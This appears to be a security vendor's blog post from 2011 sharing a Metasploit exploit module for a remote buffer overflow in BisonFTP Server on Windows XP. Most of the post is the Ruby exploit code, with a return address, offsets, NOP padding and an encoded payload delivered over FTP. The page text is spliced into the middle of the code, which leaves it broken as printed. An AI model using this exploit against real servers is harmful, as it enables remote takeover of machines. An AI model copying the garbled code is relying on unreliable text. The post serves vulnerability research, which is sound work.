Learn Search

Search across all Learn content

← Back to Security Research

Metasploit Module – BisonFTP Server Remote Buffer Overflow Vulnerability

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for BisonFTP Server Remote Buffer Overflow Vulnerability.

Sep 6, 2011By Veerendra GG2 min read

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for BisonFTP Server Remote Buffer Overflow Vulnerability.

Metasploit : Download here.

plaintext

##
# $Id: bison_server_bof.rb 2011-08-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::Remote::Ftp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'BisonFTP Server Remote Buffer Overflow Vulnerability',
            'Description'    => %q{
                    This module exploits a buffer overflow vulnerability
                    found in the BisonFTP Server

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

plaintext

,
            'References'     =>
                [
                    [ 'BID', '49109'],
                    [ 'CVE', '1999-1510'],
                    [ 'URL', 'https://www.secpod.com/blog/?p=384'],
                    [ 'URL', 'http://www.exploit-db.com/exploits/17649'],
                    [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space' => 388,
                    'BadChars' => "\x00\x0a\x0d",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'Windows XP SP3 EN',
                        {
                            'Ret' => 0x0040333f, # call edx from Bisonftp.exe
                            'Offset' => 1432
                        }
                    ],
                ],
            'DisclosureDate' => 'Aug 07 2011',
            'DefaultTarget' => 0))
    end

    def exploit
        connect

        print_status("Trying target #{target.name}...")
        print_status("Connected to #{datastore['RHOST']}:#{datastore['RPORT']}")
        sploit = rand_text_alpha(1028)                  ## Random Buffer
        sploit << "\x90" * 16                     ## Padding
        sploit << payload.encoded                 ## Encoded Payload
        sploit << "\x90" * (388 - payload.encoded.length)     ## More Nops
        sploit << [target.ret].pack('V')              ## Return Address
        sploit << rand_text_alpha(39)                 ## More Buffer

        print_status("Sending payload...")
        sock.put(sploit)

        handler
        disconnect
    end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

Metasploit Module – BisonFTP Server Remote Buffer Overflow Vulnerabili | SecPod